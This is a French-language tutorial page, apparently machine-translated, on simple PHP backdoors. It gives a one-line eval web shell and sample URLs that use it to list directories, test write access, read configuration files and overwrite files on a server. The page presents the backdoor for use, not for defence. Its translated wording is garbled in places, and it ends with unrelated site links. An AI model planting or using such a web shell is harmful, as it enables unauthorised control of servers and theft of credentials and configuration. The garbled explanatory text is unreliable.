Aujourd'hui, nous allons parler de certaines des utilisations les plus courantes des portes dérobées en PHP.
Tout d'abord, écrivez la porte dérobée la plus simple, qui peut également être appelée cheval de Troie.
<?php eval($_GET['evl']);
Ça y est, vous avez gagné beaucoup de permissions d'exécution sur ce serveur.
Quelles sont les utilisations de cette scène ?
Serveur d'impressionphpinfo
http://www.test.com/a.php?evl=phpinfo()
Vérifiez quels fichiers se trouvent dans un répertoire
http://www.test.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));Vérifiez si le répertoire est accessible en écriture, puis vous pourrez vérifier l'écriture Créer un fichier exécutable dans le répertoire
http://www.test.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));Récupérer le contenu d'un fichier, généralement utilisé pour lire la configuration
http://www.test.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));Écrire des fichiers dans un répertoire inscriptible
http://www.test.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));D'accord, ce qui précède part a fondamentalement détruit la partie qui peut compléter la visualisation d'un serveur. Essayons de tirer des conclusions sur d'autres fonctions.
Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!
Qu'est-ce qu'un fichier .Xauthority ?
Solution pour diviser le tableau de mots en deux pages
Barre oblique du tableau Excel divisée en deux
Qu'est-ce qu'un lecteur optique
Solutions aux exceptions logicielles inconnues dans les applications informatiques
Quelle plateforme est Fengxiangjia ?
Quels sont les moteurs de recherche d'annuaire ?
Quel logiciel est Penguin ?
![[Web front-end] Démarrage rapide de Node.js](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
